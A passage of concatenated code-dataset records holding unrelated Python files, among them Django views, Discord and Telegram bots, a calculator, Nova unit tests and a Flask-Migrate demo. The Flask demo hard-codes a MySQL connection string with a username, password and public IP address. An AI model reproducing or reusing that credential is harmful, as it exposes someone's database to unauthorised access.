state=True,\n category = Category.objects.get(name__iexact='Articles')\n )\n context = {\n 'title':'Home',\n 'image':'img/articles.jpg',\n 'posts':posts\n }\n return render(request, 'articles.html', context)\n\ndef tutorials(request):\n return render(request, 'tutorials.html', {'title':'Tutorials', 'image':'img/tutorials.jpg'})\n\ndef contents(request):\n posts = Post.objects.filter(\n state=True,\n category = Category.objects.get(name__iexact='Contents')\n )\n context = {\n 'title':'Contents',\n 'image':'img/contents.jpg',\n 'posts':posts\n }\n return render(request, 'contents.html', context)\n\ndef detallePost(request,slug):\n post = get_object_or_404(Post,slug=slug)\n context = {\n 'title': post.title,\n 'image': post.image,\n 'post': post\n }\n return render(request, 'post.html', context)\n\ndef contact(request):\n return render(request, 'contact.html', {'title':'Contact', 'image':'img/contact.jpg'})\n","sub_path":"blog/apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"531673374","text":"# -*- coding: utf-8 -*-\nimport random\n\nfrom hashcode20.helpers import Input, Output\nimport numpy as np\n\ndef main(i: Input) -> Output:\n \"\"\"shortest signing time and higher shipping book rate and highest average book score\"\"\"\n\n book_scores_per_library = {\n library.library_id: list(map(lambda book_id: i.scores[book_id], library.books))\n for library in i.libraries\n }\n\n libraries_sorted = sorted(i.libraries, key=lambda library:\n (library.nb_signup_days, -library.ship_book_rate, np.mean(book_scores_per_library[library.library_id])))\n library_order = list(map(lambda l: l.library_id, libraries_sorted))\n book_order_per_library = [list(l.books) for l in libraries_sorted]\n return Output(library_order, book_order_per_library)\n\n","sub_path":"hashcode20/sol/sst_hsr_highest_average_book_score.py","file_name":"sst_hsr_highest_average_book_score.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46736899","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom telegram.ext.dispatcher import run_async\nfrom telegram.ext import CommandHandler\nfrom telegram import ChatAction\nfrom pybooru import Pybooru\nfrom random import randint\nimport requests\nimport datetime\nimport yaml\n\n\ndef handler(dp):\n dp.add_handler(CommandHandler(\"a\", anime, pass_args=True))\n\nwith open(\"config.yml\", \"r\") as f:\n path = yaml.load(f)[\"path\"][\"anime\"]\n\n\ndef get_anime(update, query):\n update.message.chat.send_action(ChatAction.UPLOAD_PHOTO)\n client = Pybooru(\"yandere\")\n max_posts_to_load = 200\n posts = client.posts_list(query, max_posts_to_load)\n post_count = len(posts)\n random = randint(0, post_count - 1)\n image_post = \"https://yande.re/post/show/\" + str(posts[random][\"id\"])\n image_url = posts[random][\"sample_url\"]\n dl = requests.get(image_url)\n with open(path + \"anime_temp.jpg\", \"wb\") as f:\n f.write(dl.content)\n return image_post\n\n\n@run_async\ndef anime(bot, update, args):\n if args == []:\n input_query = \"rating:s\"\n else:\n input_query = \" \".join(args).lower()\n try:\n cap = get_anime(update, input_query)\n with open(path + \"anime_temp.jpg\", \"rb\") as f:\n update.message.reply_photo(f, caption=cap)\n print (datetime.datetime.now(),\n \">>> Sent anime:\", input_query, \">>>\",\n update.message.from_user.username)\n except:\n cap = get_anime(update, \"rating:s\")\n with open(path + \"anime_temp.jpg\", \"rb\") as f:\n update.message.reply_photo(f, caption=\"Nothing found, onii-chan, but here's one random pic:\\n\" + cap)\n print (datetime.datetime.now(),\n \">>> Tag not found:\", input_query, \", sent random\", \">>>\",\n update.message.from_user.username)\n","sub_path":"modules/anime.py","file_name":"anime.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"633486250","text":"import math, argparse, numpy, decimal\nfrom fractions import Fraction\n\n\nclass Calculator():\n def __init__(self):\n self.memory = 0\n self.pi = math.pi\n def getfraction(self, decimal):\n return decimal.as_integer_ratio()\n def getcrossproduct(self, vector1, vector2):\n return numpy.cross(vector1, vector2)\n def getdotproduct(self, vector1, vector2):\n return numpy.dot(vector1, vector2)\n def getangle(self, angle):\n if \"rad\" in str(angle):\n print(\"Angle : {} is {} deg or {} deg rectified\".format(angle, self.radtodeg(angle), self.rectifyangle(angle)))\n elif \"deg\" in str(angle):\n print(\"Angle : {} is {} rad or {} rad rectified\".format(angle, self.degtorad(angle),self.rectifyangle(angle)))\n else:\n print(\"Specify rad or deg\")\n def degtorad(self, angle):\n return(2*self.pi*self.extractfloat(angle)/360)\n def radtodeg(self, angle):\n return(360*self.extractfloat(angle)/(self.pi*2))\n def rectifyangle(self, angle):\n if \"deg\" in angle:\n rect_angle = self.degtorad(angle)\n while rect_angle > 2*self.pi:\n rect_angle-= 2*self.pi\n elif \"rad\" in angle:\n rect_angle = self.radtodeg(angle)\n while rect_angle > 360:\n rect_angle -= 360\n return rect_angle\n\n def extractfloat(self, angle):\n newstr = ''.join((ch if ch in '0123456789.-' else ' ') for ch in angle)\n rect_angle = [float(i) for i in newstr.split()]\n if \"pi/\" in str(angle) or \"pi /\" in str(angle):\n return self.pi/rect_angle[0]\n elif \"/pi\" in str(angle) or \"/ pi\" in str(angle):\n return rect_angle[0]/self.pi\n elif \"pi\" in str(angle):\n return rect_angle[0]*self.pi\n else:\n return rect_angle[0]\n def getzeros(self, a, b, c):\n radical = b**2-4*a*c\n denum = 2*a\n reel = -b/denum\n if radical >= 0:\n print(\"Zeros are : {} and {}\".format((-b+math.sqrt(radical))/denum, (-b-math.sqrt(radical))/denum))\n elif radical < 0 and len(str(math.sqrt(abs(radical))).split('.')[1]) <= 1:\n print(\"Zeros are complex and are : {} + {} i and {} - {} i\".format(reel, abs(radical)/denum, reel, abs(radical)/denum))\n else:\n print(\"Zeros are complex and are : {} + √{}/{} i and {} - √{}/{} i\".format(reel, abs(radical), denum, reel, abs(radical), denum))\n\n def a_parmi_b(self, a, b):\n return math.factorial(b)/(math.factorial(a)*(math.factorial(b-a)))\n\n\ndef parseall():\n parser = argparse.ArgumentParser(description=\"Calculator\")\n parser.add_argument(\"-a\", \"--angle\", metavar=\"Float\",default=None, dest='angle', help=\"L'angle à convertir, il faut définir l'unité après la valeur (deg ou rad)\")\n parser.add_argument(\"-v1\", \"--vector1\", metavar=\"Vector\", default=None,type=float, dest='vector1',nargs='+', help=\"Composantes du premier vecteur\")\n parser.add_argument(\"-v2\", \"--vector2\", metavar=\"Vector\", default=None,type=float, dest='vector2',nargs='+', help=\"Composantes du deuxième vecteur\")\n parser.add_argument(\"-dp\", \"--dotproduct\",default=False, action='store_true', dest='dproduct', help='Calcule le produit scalaire, prends des vecteurs en entrée')\n parser.add_argument(\"-cp\", \"--crossproduct\",default=False,action='store_true', dest='cproduct', help='Calcule le produit vectoriel, prends des vecteurs en entrée')\n parser.add_argument(\"-q\", \"--quadratic\",metavar = \"Float\", nargs='+',default=None, dest='quad',type=float,help=\"Calcule les zéros d'une fonction quadratique\")\n parser.add_argument(\"-f\", \"--fraction\",metavar=\"Float\", default=None, dest='fraction', type=float, help=\"Calcule la fraction associée à un chiffre decimal\")\n parser.add_argument(\"-ab\", \"--abyb\", metavar=\"Int\", default=None,type=int, dest='abyb',nargs='+', help=\"Calcule a parmi b\")\n return parser.parse_args()\n\ndef main():\n ARGS = parseall()\n calc = Calculator()\n if ARGS.angle is not None:\n calc.getangle(ARGS.angle)\n elif ARGS.quad is not None:\n calc.getzeros(ARGS.quad[0], ARGS.quad[1], ARGS.quad[2])\n elif ARGS.fraction is not None:\n print(calc.getfraction(ARGS.fraction))\n elif ARGS.dproduct is True and ARGS.vector1 is not None and ARGS.vector2 is not None:\n print(\"Dot product between vector {} and vector {} is {}\".format(ARGS.vector1, ARGS.vector2, calc.getdotproduct(ARGS.vector1, ARGS.vector2)))\n elif ARGS.cproduct is True and ARGS.vector1 is not None and ARGS.vector2 is not None:\n print(\"Cross product between vector {} and vector {} is {}\".format(ARGS.vector1, ARGS.vector2, calc.getcrossproduct(ARGS.vector1, ARGS.vector2)))\n elif ARGS.abyb is not None:\n print(calc.a_parmi_b(ARGS.abyb[0], ARGS.abyb[1]))\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42945052","text":"from __future__ import annotations\n\nfrom base.struct import Config\n\nfrom bs4 import BeautifulSoup\nfrom discord_components import DiscordComponents\n\nfrom discord.ext import commands, tasks\nimport discord, json, logging, aiohttp\n\nlogging.basicConfig(level=logging.INFO)\n\nintents = discord.Intents().all()\n\nclass Bot(commands.Bot):\n def __init__(self):\n \n super().__init__(\n intents=intents,\n command_prefix=commands.when_mentioned_or('s.'),\n description='Bot de nível da Kiniga Brasil.',\n activity=discord.Streaming(name=\"https://kiniga.com/\", url='https://kiniga.com/')\n ),\n DiscordComponents(self),\n self.remove_command('help'),\n self.feed.start()\n \n\n with open('config.json', 'r', encoding='utf-8') as f:\n self.cfg = Config(json.loads(f.read()))\n\n self.cog_list = ['cogs.ajuda', 'cogs.loja', 'cogs.mod', 'cogs.perfil', 'cogs.user']\n for cog in self.cog_list:\n try:\n self.load_extension(cog)\n except Exception as e:\n print(f'Error occured while cog \"{cog}\" was loaded.\\n{e}')\n \n\n def cog_unload(self):\n self.feed.close()\n return \n \n def startup(self):\n self.run(self.cfg.bot_token)\n \n @tasks.loop(minutes = 5)\n async def feed(self):\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://kiniga.com/\") as resp:\n soup = BeautifulSoup(await resp.text(), 'lxml')\n table = soup.find('table', attrs={'class':'manga-chapters-listing'})\n titles = table.find('td', attrs={'class':'title'})\n for t in titles:\n try:\n links = table.find_all('td', attrs={'class':'release'})[0]\n for l in links.find_all('a', href=True):\n try:\n emoji = self.get_emoji(id=785300070857572372)\n channel = discord.utils.get(self.get_all_channels(), \n guild__name=self.cfg.guild, \n id=self.cfg.chat_cmds)\n messages = await channel.history(limit=1).flatten()\n messages.reverse()\n cont = '{} | Saiu o **{}** de **{}**!\\n{}'.format(emoji, l.get_text(),\n t.get_text(),\n l['href'])\n member = channel.guild.get_member(741770490598653993)\n webhooks = await channel.webhooks()\n webhook = discord.utils.get(webhooks, name = \"Capitulos Recentes\")\n \n if webhook is None:\n webhook = await channel.create_webhook(name = \"Capitulos Recentes\")\n \n for i, message in enumerate(messages):\n message = message.content\n if message == cont:\n pass\n else:\n await webhook.send(cont, username = member.name, avatar_url = member.avatar_url)\n except Exception as e: raise e\n else: pass\n except Exception as e: raise e\n else: pass\n \n @feed.before_loop # wait for the bot before starting the task\n async def before_send(self):\n print('Iniciando...')\n await self.wait_until_ready()\n return\n\n\nif __name__ == '__main__':\n Bot().startup()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"585128659","text":"#!/usr/bin/env python3\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\nclass MotorDriver:\n freq = 100\n duty = 100\n\n def __init__(self,pin1,pin2,pin3):\n GPIO.setmode(GPIO.BCM)\n self.channels = [pin1,pin2,pin3]\n GPIO.setup(self.channels,GPIO.OUT)\n self.pwmf = GPIO.PWM(self.channels[0],self.freq) \n self.pwmb = GPIO.PWM(self.channels[1],self.freq)\n self.pwml = GPIO.PWM(self.channels[2],self.freq)\n self.pwmf.start(0)\n self.pwmb.start(0)\n self.pwml.start(0)\n \n def __setting(self):\n self.pwmf.ChangeDutyCycle(0)\n self.pwmb.ChangeDutyCycle(0)\n self.pwml.ChangeDutyCycle(0)\n time.sleep(0.0001)\n \n def goForward(self,duty=60):\n self.__setting()\n self.pwmf.ChangeDutyCycle(duty)\n \n def goBackward(self,duty=60):\n self.__setting()\n self.pwmb.ChangeDutyCycle(duty)\n \n def turbo(self):\n self.__setting()\n self.pwmf.ChangeDutyCycle(100)\n time.sleep(1)\n self.goForward()\n\n def breaking(self):\n self.__setting()\n self.pwmf.ChangeDutyCycle(100)\n self.pwmb.ChangeDutyCycle(100)\n self.pwml.ChangeDutyCycle(100)\n\n def stop(self):\n self.__setting()\n \n def clean(self):\n GPIO.cleanup(self.channels)\n\nclass MotorDriverwithCSC(MotorDriver):\n def gowithCSC(self,duty,cadence):\n if duty == 0:\n if cadence > 100:\n cadence = 100\n self.goBackward(cadence)\n else:\n self.goForward(duty)\n \n'''\ndef test():\n try:\n motor= MotorDriver(19,26,13)\n motor.goForward()\n time.sleep(10)\n print(\"goBackward\")\n motor.goBackward()\n time.sleep(10)\n print(\"stop\")\n motor.stop()\n time.sleep(3)\n print(\"breaking\")\n motor.breaking()\n time.sleep(3)\n except KeyboardInterrupt:\n pass\n finally: \n motor.clean()\n print(\"end\")\n\nif __name__ == '__main__':\n test()\n'''\n","sub_path":"carpc/Parts/MotorDriver.py","file_name":"MotorDriver.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"35126075","text":"from django.contrib import admin\nfrom django.urls import path\nfrom capacityWeb import views\n\napp_name = '[capacityWeb]'\nurlpatterns = [\n # 主页\n path('index/', views.index, name='index'),\n # 各景区详细信息\n path('meifeng/', views.meifeng, name='meifeng'),\n path('huangshanjian/', views.huangshanjian, name='huangshanjian'),\n path('tianchi/', views.tianchi, name='tianchi'),\n path('yueguang/', views.yueguang, name='yueguang'),\n path('longshan/', views.longshan, name='longsha'),\n path('yule/', views.yule, name='yule'),\n path('guihua/', views.guihua, name='guihua'),\n path('mishan/', views.mishan, name='mishan'),\n path('updatetodayTouristNums/', views.updatetodayTouristNums),\n path('updatetodayTouristNums2/', views.updatetodayTouristNums2),\n path('getScenicHeartMapData/', views.getScenicHeartMapData),\n # 预警分析\n path('mfanalysis/', views.mf_analysis, name='mfanalysis'),\n path('msanalysis/', views.ms_analysis, name='msanalysis'),\n path('tcanalysis/', views.tc_analysis, name='tcanalysis'),\n path('lsanalysis/', views.ls_analysis, name='lsanalysis'),\n path('ghanalysis/', views.gh_analysis, name='ghanalysis'),\n path('yganalysis/', views.yg_analysis, name='yganalysis'),\n path('ylanalysis/', views.yl_analysis, name='ylanalysis'),\n path('hsanalysis/', views.hs_analysis, name='hsanalysis'),\n # 后台管理\n path('admin/', views.admin, name='admin'),\n path('getAdminData/', views.getAdminData),\n path('deleteAdminData/', views.deleteAdminData),\n path('addAdminData/', views.addAdminData),\n path('getAdminerData/', views.getAdminerData),\n path('deleteAdminerData/', views.deleteAdminerData),\n path('addAdminerData/', views.addAdminerData),\n # 预警管理\n path('admin_warn/', views.admin_warn, name='admin_warn'),\n path('getWarnData/', views.getWarnData),\n path('DetectWarn/', views.DetectWarn),\n path('notice/', views.notice),\n path('deleteWarnData/', views.deleteWarnData),\n path('addWarnData/', views.addWarnData),\n # 退出登录\n path('logout/', views.logout, name='logout')\n]\n","sub_path":"capacityWeb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"105271900","text":"#\n# Copyright (c) 2015, Platform9 Systems\n# All Rights Reserved\n#\n\nfrom nova.tests.unit.api.openstack import fakes\n\nfrom nova import compute\nfrom nova import network\nfrom nova import test\nfrom nova.api.openstack.compute import virtual_interfaces\nfrom nova.api.openstack.compute import pf9_virtual_interfaces\nfrom nova.objects import virtual_interface as vif_obj\nfrom nova.tests.unit import policy_fixture\n\nFAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'\nVIFS = [{'uuid': '00000000-0000-0000-0000-00000000000000000',\n 'address': '00-00-00-00-00-00',\n 'instance_uuid': '00-00-00-00-00-00',\n 'network_id': '123'},\n {'uuid': '11111111-1111-1111-1111-11111111111111111',\n 'address': '11-11-11-11-11-11',\n 'instance_uuid': '11-11-11-11-11-11',\n 'network_id': '456'}]\n\n\ndef compute_api_get(self, context, instance_id, expected_attrs=None,\n want_objects=False):\n return dict(uuid=FAKE_UUID, id=instance_id, instance_type_id=1, host='bob')\n\ndef _generate_fake_vifs():\n global VIFS\n fake_vifs = []\n for i in range(0, len(VIFS)):\n vif = vif_obj.VirtualInterface()\n vif.uuid = VIFS[i]['uuid']\n vif.address = VIFS[i]['address']\n vif.network_id = VIFS[i]['network_id']\n fake_vifs.append(vif)\n return fake_vifs\n\n\ndef get_vifs_by_instance(self, context, instance_id):\n return _generate_fake_vifs()\n\n\ndef delete_vif(self, context, instance_uuid, vif_id):\n global VIFS\n\n for i in range(0, len(VIFS)):\n if VIFS[i]['uuid'] == vif_id:\n del VIFS[i]\n return\n\nclass FakeRequest(object):\n def __init__(self, context):\n self.environ = {'nova.context': context.get_admin_context()}\n\nclass ServerVirtualInterfacePF9Test(test.NoDBTestCase):\n\n def setUp(self):\n super(ServerVirtualInterfacePF9Test, self).setUp()\n self.stubs.Set(compute.api.API, \"get\",\n compute_api_get)\n self.stubs.Set(network.api.API, \"get_vifs_by_instance\",\n get_vifs_by_instance)\n self.stubs.Set(network.api.API, \"delete_vif_for_instance_pf9\",\n delete_vif)\n self.vif_controller = pf9_virtual_interfaces.VirtualInterfacePf9Controller()\n self.os_vif_controller = virtual_interfaces.ServerVirtualInterfaceController()\n self.policy = self.useFixture(policy_fixture.RealPolicyFixture())\n\n def test_virtual_interfaces_delete(self):\n url = '/v2/fake/servers/abcd/action'\n body = {'removeVif': '11111111-1111-1111-1111-11111111111111111'}\n req = fakes.HTTPRequest.blank(url, use_admin_context=True)\n self.vif_controller._removeVif(req, FAKE_UUID, body)\n\n req = fakes.HTTPRequest.blank('/v2/fake/servers/abcd/os-virtual-interfaces')\n resp = self.os_vif_controller.index(req, 'abcd')\n self.assertIsNotNone(resp, 'NULL response from os-virtual-interfaces')\n data = resp['virtual_interfaces']\n self.assertEqual(len(data), 1, 'Incorrect interfaces : %s' % data)\n\n","sub_path":"tests/unit/api/openstack/compute/test_virtual_interfaces_pf9.py","file_name":"test_virtual_interfaces_pf9.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"527352787","text":"# included from snippets/main.py\ndef debug(*x, msg=\"\"):\n import sys\n print(msg, *x, file=sys.stderr)\n\n\ndef solve(SOLVE_PARAMS):\n pass\n\n\ndef main():\n N, K = map(int, input().split())\n for _i in range(K):\n s = str(N)\n g1 = int(\"\".join(sorted(s, reverse=True)))\n g2 = int(\"\".join(sorted(s)))\n N = g1 - g2\n\n print(N)\n\n\n# tests\nT1 = \"\"\"\n314 2\n\"\"\"\nTEST_T1 = \"\"\"\n>>> as_input(T1)\n>>> main()\n693\n\"\"\"\nT2 = \"\"\"\n1000000000 100\n\"\"\"\nTEST_T2 = \"\"\"\n>>> as_input(T2)\n>>> main()\n0\n\"\"\"\nT3 = \"\"\"\n6174 100000\n\"\"\"\nTEST_T3 = \"\"\"\n>>> as_input(T3)\n>>> main()\n6174\n\"\"\"\n\n\ndef _test():\n import doctest\n doctest.testmod()\n g = globals()\n for k in sorted(g):\n if k.startswith(\"TEST_\"):\n print(k)\n doctest.run_docstring_examples(g[k], g, name=k)\n\n\ndef as_input(s):\n \"use in test, use given string as input file\"\n import io\n f = io.StringIO(s.strip())\n g = globals()\n g[\"input\"] = lambda: bytes(f.readline(), \"ascii\")\n g[\"read\"] = lambda: bytes(f.read(), \"ascii\")\n\n\nif __name__ == \"__main__\":\n import sys\n input = sys.stdin.buffer.readline\n read = sys.stdin.buffer.read\n sys.setrecursionlimit(10 ** 6)\n if sys.argv[-1] == \"-t\":\n print(\"testing\")\n _test()\n sys.exit()\n main()\n sys.exit()\n\n# end of snippets/main.py\n","sub_path":"abc192/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"459490600","text":"# Copyright (C) 2015 Niklas Rosenstein\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom . import dis\nfrom . import ident\nfrom . import lists\nfrom . import path\nfrom . import proxy\nfrom . import shell\nimport os\nimport sys\nimport errno\nimport craftr\nimport collections\nimport zipfile\n\n\nclass DataEntity(object):\n ''' Container for data of a module or a script. '''\n\n def __init__(self, entity_id):\n super().__init__()\n self.__entity_id__ = entity_id\n\n def __repr__(self):\n return ''.format(self.__entity_id__)\n\n\ndef singleton(x):\n ''' Decorator for a singleton class or function. The class or\n function will be called and the result returned. '''\n\n return x()\n\n\ndef accept_keys(dictionary, keys, name='key'):\n ''' This function ensures that the *dictionary* only contains the\n specified *keys*. *keys* can be a string in which case it is split\n by whitespace or comma. A `TypeError` is raised if an invalid key\n is detected. '''\n\n if isinstance(keys, str):\n if ',' in keys:\n keys = keys.split(',')\n else:\n keys = keys.split()\n invalids = set(dictionary.keys()).difference(set(keys))\n if invalids:\n key = next(iter(invalids))\n raise TypeError('unexpected {} {!r}'.format(name, key))\n\n\ndef get_calling_module(module=None):\n ''' Call this from a rule function to retrieve the craftr module that\n was calling the function from the stackframe. If the module can not\n retrieved, a `RuntimeError` is raised. '''\n\n if module is None:\n frame = sys._getframe(2) # get_calling_module() - rule - module\n if 'module' not in frame.f_globals:\n raise RuntimeError('could not read \"module\" variable')\n module = proxy.resolve_proxy(frame.f_globals['module'])\n else:\n module = proxy.resolve_proxy(module)\n\n if not isinstance(module, craftr.runtime.Module):\n raise RuntimeError('\"module\" is not a Module object')\n return module\n\n\nclass CommandBuilder(object):\n ''' This is a helper class to generate commands based on a set\n of options. These options can be passed to `__call__()` to generate\n the result list.\n\n builder = CommandBuilder(['clang++', '-c', '-arch', 'x86_amd64'])\n builder.switch('debug',\n enabled=['-g', '-O0'],\n disabled=['-O3'])\n build.add\n command = builder(debug=True)\n '''\n\n def __init__(self, base=()):\n super().__init__()\n self._parts = []\n self.append(base)\n\n def __call__(self, **options):\n ''' Generate the list using the specified *\\*\\*options*. '''\n\n result = []\n for part in self._parts:\n if part['type'] == 'append_args':\n result.extend(part['args'])\n elif part['type'] == 'append_func':\n args = part['func'](options)\n result.extend(lists.autoexpand(args))\n elif part['type'] == 'switch':\n value = options.get(part['name'], None)\n if part['func']:\n args = part['func'](value)\n result.extend(lists.autoexpand(args))\n if value:\n result.extend(part['enabled'])\n else:\n result.extend(part['disabled'])\n else:\n raise RuntimeError('invalid part type {!r}'.format(part['type']))\n return result\n\n def append(self, flags):\n ''' This function acts differently based on the type of *flags*. If\n it is a function, it will be called with a dictionary of all options\n as the first argument and the return value must be a list that will\n be appended to the result. Otherwise, *flags* is assumed to be a\n sequence that is directly appended to the result. All values are\n expanded using `lists.autoexpand()`. '''\n\n if callable(flags):\n self._parts.append({\n 'type': 'append_func',\n 'func': flags})\n return flags\n elif isinstance(flags, collections.Iterable):\n self._parts.append({\n 'type': 'append_args',\n 'args': lists.autoexpand(flags)})\n else:\n raise TypeError('flags must be callable or iterable')\n\n def switch(self, option, func=None, enabled=(), disabled=()):\n ''' If the option is enabled (ie. given and True), append the\n *enabled* items to the result, otherwise append *disabled*. If\n *func* is given, it is passed the values of *option* as the\n first argument.\n\n The *enabled* and *disabled* lists and the return value of\n *func* are expanded using the `lists.autoexpand()` function. '''\n\n if func and not callable(func):\n raise TypeError('func must be callable')\n self._parts.append({\n 'type': 'switch',\n 'name': option,\n 'func': func,\n 'enabled': lists.autoexpand(enabled),\n 'disabled': lists.autoexpand(disabled)})\n\n\ndef build_archive(filename, base_dir, include=(), exclude=(),\n prefix=None, quiet=False):\n ''' Build a ZIP archive at *filename* and include the specified files.\n The *base_dir* is stripped from the absolute filenames to find the\n arcname. '''\n\n include = [path.normpath(x, base_dir) for x in lists.autoexpand(include)]\n exclude = [path.normpath(x, base_dir) for x in lists.autoexpand(exclude)]\n files = set(include) - set(exclude)\n\n if not files:\n raise ValueError('no files to build an archive from')\n\n for fn in files:\n if not os.path.exists(fn):\n raise OSError(errno.ENOENT, 'No such file or directory: {!r}'.format(fn))\n\n zf = zipfile.ZipFile(filename, 'w')\n for fn in files:\n arcname = path.relpath(fn, base_dir).replace('\\\\', '/')\n if arcname == os.curdir or arcname.startswith(os.pardir):\n raise ValueError('pathname not a subdir of basedir', fn, base_dir)\n if prefix:\n arcname = prefix + '/' + arcname\n if not quiet:\n craftr.logging.clear_line()\n print('writing {!r}... '.format(arcname), end='')\n zf.write(fn, arcname)\n if not quiet:\n print('done.', end='')\n zf.close()\n if not quiet:\n craftr.logging.clear_line()\n print('{} files compressed in {!r}'.format(len(files), filename))\n","sub_path":"craftr/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165415119","text":"# User input testing\nkeysPressed = []\ndef testKeyPressed(key):\n return key in keysPressed\n\n# Overlap detection\ndef testSpriteOverlap(sprite1,sprite2):\n noOverlap = ((sprite1.rightSide <= sprite2.leftSide) or\n (sprite2.rightSide <= sprite1.leftSide) or\n (sprite1.bottomSide <= sprite2.topSide) or\n (sprite2.bottomSide <= sprite1.topSide))\n return not noOverlap\n\n# Creates a moving background (for games like Galaga) - 2 Background Sprites needed\ndef backgroundWrap(background,background2,speed):\n if background.x >= -720:\n background.moveSprite(speed,0)\n background2.moveSprite(speed,0)\n else:\n background.x = 0\n background2.x = 720\n background.moveSprite(speed,0)\n background2.moveSprite(speed,0)\n\n background.updateSprite()\n background2.updateSprite()\n\n###########\n# Colors! #\n###########\n\nWHITE = (255,255,255)\nGREEN = (0,255,0)\nRED = (255,0,0)\nBLUE = (0,0,255)\nBLACK = (0,0,0)\nGREY = (160,160,160)\nFUCHSIA = (255, 0, 255)\nGRAY = (128, 128, 128)\nLIME = (0, 128, 0)\nMAROON = (128, 0, 0)\nNAVYBLUE = (0, 0, 128)\nOLIVE = (128, 128, 0)\nPURPLE = (128, 0, 128)\nTEAL = (0,128,128)","sub_path":"src/core/HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"50518673","text":"from flask_migrate import Migrate, MigrateCommand\nfrom flask import Flask\nfrom flask_script import Shell, Manager\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://jhonchen:2553522375@47.100.200.127:3306/flask_practice'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nmanager = Manager(app)\n\nmigrate = Migrate(app, db)\n\"\"\"manager是Flask-Script的实例,这条语句在flask-Script中添加一个db命令\"\"\"\nmanager.add_command('db', MigrateCommand)\n\n\nclass Role(db.Model):\n __tablename__ = 'roles'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n\n users = db.relationship('User', backref='role')\n\n def __repr__(self):\n return '' % self.name\n\n\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(64), unique=True, index=True)\n\n role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))\n\n def __repr__(self):\n return '' % self.username\n\n\n@app.route('/')\ndef index():\n return 'Hello World!'\n\n\nif __name__ == \"__main__\":\n # 更新现有数据库表的粗暴方式是先删除旧表再重新创建\n db.drop_all()\n db.create_all()\n # 下面这段代码创建了一些用户。\n admin_role = Role(name='Admin')\n mod_role = Role(name='Moderator')\n user_role = Role(name='User')\n user_jhon = User(username='jhon', role=admin_role)\n user_susan = User(username='susan', role=user_role)\n user_david = User(username='david', role=user_role)\n\n db.session.add_all([admin_role, mod_role, user_role, user_david, user_jhon, user_susan])\n db.session.commit()\n manager.run()\n\n\"\"\"检查并修正迁移脚本之后,我们可以使用 db upgrade 命令把迁移应用到数据库中:\n(venv) E:\\GitHub\\Code_Practice\\F_flask\\Part4_数据库>python demo8_数据库迁移.py db upgrade\nINFO [alembic.runtime.migration] Context impl MySQLImpl.\nINFO [alembic.runtime.migration] Will assume non-transactional DDL.\n\n(venv) E:\\GitHub\\Code_Practice\\F_flask\\Part4_数据库>\n 对于第一个迁移来说,其作用和调用db.create_all()方法一样。但在后续的迁移中,upgrade命令能把改动应用到数据库中,且不\n 